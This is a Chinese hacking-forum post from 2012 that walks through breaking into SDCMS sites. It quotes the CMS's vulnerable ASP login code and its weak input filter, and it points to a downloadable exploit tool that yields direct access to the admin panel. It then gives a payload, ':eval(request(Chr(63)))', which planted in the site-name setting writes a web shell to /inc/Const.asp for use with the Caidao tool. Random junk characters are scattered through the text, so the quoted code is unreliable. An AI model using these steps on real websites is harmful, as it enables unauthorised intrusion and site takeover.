作者:T00LS 鬼哥( b& F |# R' _- K) z; i( N
漏洞文件:后台目录/index.asp l: [4 x' D6 ?% I$ N: U
7 U# {# |( K( u3 g- M
Sub Check
! R2 d- H0 J! c6 n& s- R* A# H Dim username,password,code,getcode,Rs
1 a7 d# d! v3 E: \4 i IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub
/ Y' T$ U/ v7 L; o( W username=FilterText(Trim(Request.Form("username")),1)
( a5 q& n6 d6 B4 ]4 x2 ?: T) U password=FilterText(Trim(Request.Form("password")),1)( h: T' H7 P0 H
code=Trim(Request.Form("yzm"))
$ [9 x. b; t p& i- q! m' B) Y getcode=Session("SDCMSCode"), T( ?9 _! m/ M1 T
IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died/ U6 ~0 s5 W" k1 P2 R$ f" E
IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied1 ^: n2 m# F W) I
IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied
* \2 s) {; m: i A+ i9 y IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied b# I7 o- e x
IF username="" or password="" Then; T' Z: }" Y+ K! j4 [ p' ~2 _
Echo "用户名或密码不能为空"ied0 N0 [2 } U' s0 ]0 M
Else M' `, X0 E+ ~, p0 \! |
Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'"); K1 t5 w, k; T) O" V4 \
IF Rs.Eof Then
: v3 `" F5 f# T! Z; ? AddLog username,GetIp,"登录失败",1% x( ^% R5 q8 _' P
Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"
$ O3 Y' ~: J; S7 H7 C' L6 R _1 Q6 b2 p Else
4 [. F a- M S i( i0 p6 K( S Add_Cookies "sdcms_id",Rs(0)
, s5 D$ n2 c% f0 L4 k Add_Cookies "sdcms_name",username: o9 W/ U) I, f; h; r
Add_Cookies "sdcms_pwd",Rs(2)
) s( R8 H& z& A* H# \& E( z' d) P Add_Cookies "sdcms_admin",Rs(3)8 {' p4 H# \7 m6 x6 j9 M- `1 Z
Add_Cookies "sdcms_alllever",Rs(4)
: \* k' S0 u6 O. G- `& v7 z Add_Cookies "sdcms_infolever",Rs(5)3 Y, A; o* P" [& |2 r/ o+ d
Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")3 k( c6 b7 a9 H( X1 ^
AddLog username,GetIp,"登录成功",1
9 `6 I2 e) Y( @* f9 }8 G- { '自动删除30天前的Log记录
) x5 P" Z% T4 S; O g* a/ d IF Sdcms_DataType Then3 K0 `6 Q4 C5 `; A
Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30"). o( j1 w3 S1 v
Else
7 Y) _0 c2 @0 [# Y& n a; P Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")
' H! ~5 e2 v8 f m3 g% Y# i- F- ? End IF
1 z$ k) a) E/ x) d* R8 n: s Go("sdcms_index.asp")/ j" i" a+ z$ S6 n$ x
End IF8 L5 r& b. ~9 t, Y( Z
Rs.Close
, ^1 f8 M2 V' j Set Rs=Nothing
/ ]+ Z7 A8 s6 m: F5 z End IF
: v- X: U `+ Y' @% O- A5 j' ]End Sub
9 g" c9 n/ B1 K: K6 {1 _( `
. r3 P. U. r( {& v. _’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码2 T% i) {& b5 T2 `4 Z5 J
$ m/ k! o1 {- G4 {& w6 v4 dFunction FilterText(ByVal t0,ByVal t1)
! G1 {5 b0 ~# m; R IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function, Y& ~1 `' K& |7 J) H
t0=Trim(t0)( z! i, D" |% |, L& T$ a+ x
Select Case t15 i7 T8 ~) d# H: N1 @
Case "1"% k3 c9 U2 U! w% U3 X
t0=Replace(t0,Chr(32),"")" h5 V$ T+ S; M( B- g0 r
t0=Replace(t0,Chr(13),"")
- K8 p# c! _) Q4 }5 n$ b t0=Replace(t0,Chr(10)&Chr(10),""); `1 ^; `: y) {! A5 j8 L4 O
t0=Replace(t0,Chr(10),"")
' o4 ~1 X( n5 \1 `1 u Case "2"# R! C% }& N* A4 e# |6 Z7 @0 N
t0=Replace(t0,Chr(8),"")'回格2 \: f! ?4 d! H9 k$ T" j
t0=Replace(t0,Chr(9),"")'tab(水平制表符)
# f* h- P- i; s. @) ^ t0=Replace(t0,Chr(10),"")'换行
+ Q7 F* U; G9 x3 y% G t0=Replace(t0,Chr(11),"")'tab(垂直制表符)+ j- E- C3 ^# V3 M: O6 ]
t0=Replace(t0,Chr(12),"")'换页; `: s! w; i7 R$ @- ?( _ O. P4 m
t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合: b, Y# G4 g: Z5 i) p
t0=Replace(t0,Chr(22),"")
+ \# e i. { R# D2 S t0=Replace(t0,Chr(32),"")'空格 SPACE
! b" l+ K" g% f t0=Replace(t0,Chr(33),"")'!
' N: v0 ~0 u0 e/ J" x3 }) K t0=Replace(t0,Chr(34),"")'"
% i, i& x/ h6 l0 g4 g3 @ T, V+ g t0=Replace(t0,Chr(35),"")'#5 O3 U& n: w* w [2 B: [
t0=Replace(t0,Chr(36),"")'$
6 _- ^9 m! c7 z: Z t0=Replace(t0,Chr(37),"")'%
$ l+ G3 @. F+ i7 Y& Z t0=Replace(t0,Chr(38),"")'&9 _4 _4 C7 K1 m# ~' h* {
t0=Replace(t0,Chr(39),"")''
. k' C; P3 U& ] t0=Replace(t0,Chr(40),"")'(- ?- z) w8 B: d$ z8 R
t0=Replace(t0,Chr(41),"")')
3 |( q U( B) c& g1 C: C/ `1 L t0=Replace(t0,Chr(42),"")'*6 `' }- `- D( K# L1 S0 M I
t0=Replace(t0,Chr(43),"")'+3 ~" @$ o i% l# o
t0=Replace(t0,Chr(44),"")',. |3 G8 J& i! Q7 C
t0=Replace(t0,Chr(45),"")'-
% I% E! T: ?6 Y- T( U* P& F t0=Replace(t0,Chr(46),"")'.
. G% U6 |, ]/ A$ j$ |% v2 O! s t0=Replace(t0,Chr(47),"")'/
% _- d) M* C. [# r* S# R t0=Replace(t0,Chr(58),"")':
$ s5 U" ]1 q, |5 ?4 \3 v6 O t0=Replace(t0,Chr(59),"")';0 p5 l" F8 O+ _
t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>
; i7 S/ ]: i6 |) ~3 g, _ t0=Replace(t0,Chr(63),"")'?/ n. z* l. K/ S/ J" h
t0=Replace(t0,Chr(64),"")'@8 o9 N/ t! M) r# u {! _
t0=Replace(t0,Chr(91),"")'\; J) Z" R% S# y( `- A
t0=Replace(t0,Chr(92),"")'\
% t1 E3 _3 g& ?; |, | t0=Replace(t0,Chr(93),"")']
K, t, o/ H; e+ u' B3 \ t0=Replace(t0,Chr(94),"")'^( j5 s! k" R6 h7 b- k6 I
t0=Replace(t0,Chr(95),"")'_
$ K2 P+ L/ o9 H, E8 p4 }0 l/ ] t0=Replace(t0,Chr(96),"")'`6 b3 H# a& |( y. e% x
t0=Replace(t0,Chr(123),"")'{
2 k' Z' P/ @ Z+ B9 o t0=Replace(t0,Chr(124),"")'|
; S& w) [% W& j o9 v7 g$ T5 e t0=Replace(t0,Chr(125),"")'}
& \: b) ~9 k& i t0=Replace(t0,Chr(126),"")'~# D7 G! g! N& U
Case Else! R( J2 y0 S- W8 S8 V
t0=Replace(t0, "&", "&")9 e" `( h/ a8 J5 ^
t0=Replace(t0, "'", "'"). }+ j; j) H' W: n
t0=Replace(t0, """", """)
( d& S( `6 b& C) x) g; C u t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")
8 q w1 ?, y- B8 q, M# W End Select
" ]! J1 s# m/ K: i/ t IF Instr(Lcase(t0),"expression")>0 Then
8 P9 H2 X/ x" o$ ]. Z) q t0=Replace(t0,"expression","e­xpression", 1, -1, 0)7 Z L7 D* p. ^3 \. w4 }0 v
End If
/ E+ o# ?; G& E) M ]* c FilterText=t0
5 H; O+ n8 U" j- kEnd Function
) d4 @) c: m a. y: \3 M$ r
5 L* A" |& L |看到没。直接参数是1 只过滤: _% c/ j! B6 f# |# w+ x8 k
t0=Replace(t0,Chr(32)," ")
. w8 j8 z6 M; E6 k$ s/ O t0=Replace(t0,Chr(13),"")
5 i" V4 D1 O/ @ t0=Replace(t0,Chr(10)&Chr(10),"
0 p2 ? S3 m0 X3 Z. W% N( }. W"): k( F! x, m1 Z4 w$ I
t0=Replace(t0,Chr(10),"7 @; M e; _ `. ?7 K
")
; E* ]* q) J9 r. x L5 m漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!
; P- `; Q# K3 R$ K9 k/ TEXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP
( h) `; J0 Q+ T# S' \
/ X! k$ V- f+ H" E测试:, ]) J( v5 g3 e7 s& I" C: K, n" Q
- x6 Y% |# L; ]! a" Z$ ?" B% D7 w# p" I( B+ d7 c
现在输入工具上验证码,然后点OK
- l8 |: G: x1 V/ @4 C. K# H
) _. a4 m0 z) q# Y+ p' m: t) n$ c
; {* f: k D$ U ]; v$ m; n看到我们直接进入后台管理界面了,呵呵!" L4 P( l9 F# @/ d7 L( }# L) {9 F P
9 R) ^# ?5 [3 f# w
$ f! ?- D. A, f# N
+ A: x5 U+ ? Q/ n+ \9 E) k这样直接进入后台了。。。。
b$ L, P" f1 ^2 v/ H; G' D+ x H; m
$ n- r) c7 g: B6 I
$ w! M/ K9 j# z* D; d: W0 I2 }7 D6 ]SDCMS提权:0 D3 H7 v% s+ T; z" A$ `" x+ i
6 i& W3 `7 _1 E5 {
方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?
: G+ `3 G3 ^+ D {) O) D8 a
+ z0 J9 K# {* Q( r* j: X& ~, L; P: r: V
, |! V7 X7 \. O+ C1 Q$ e3 K% n
OK,现在用菜刀连接下!
) x) n0 r4 b2 G: ]9 r
8 Z+ q( Q, T: `' w$ Y$ [8 ^8 M
c, v' [2 ^9 ~/ D! Q4 X- L
5 s* D* T$ j( Y0 l& Y
: |* A9 P# H0 o8 O, b/ T3 g4 A" Y8 u- v7 L, m3 j& V" S
|
发表于 2012-11-9 20:57:02
收藏
支持
反对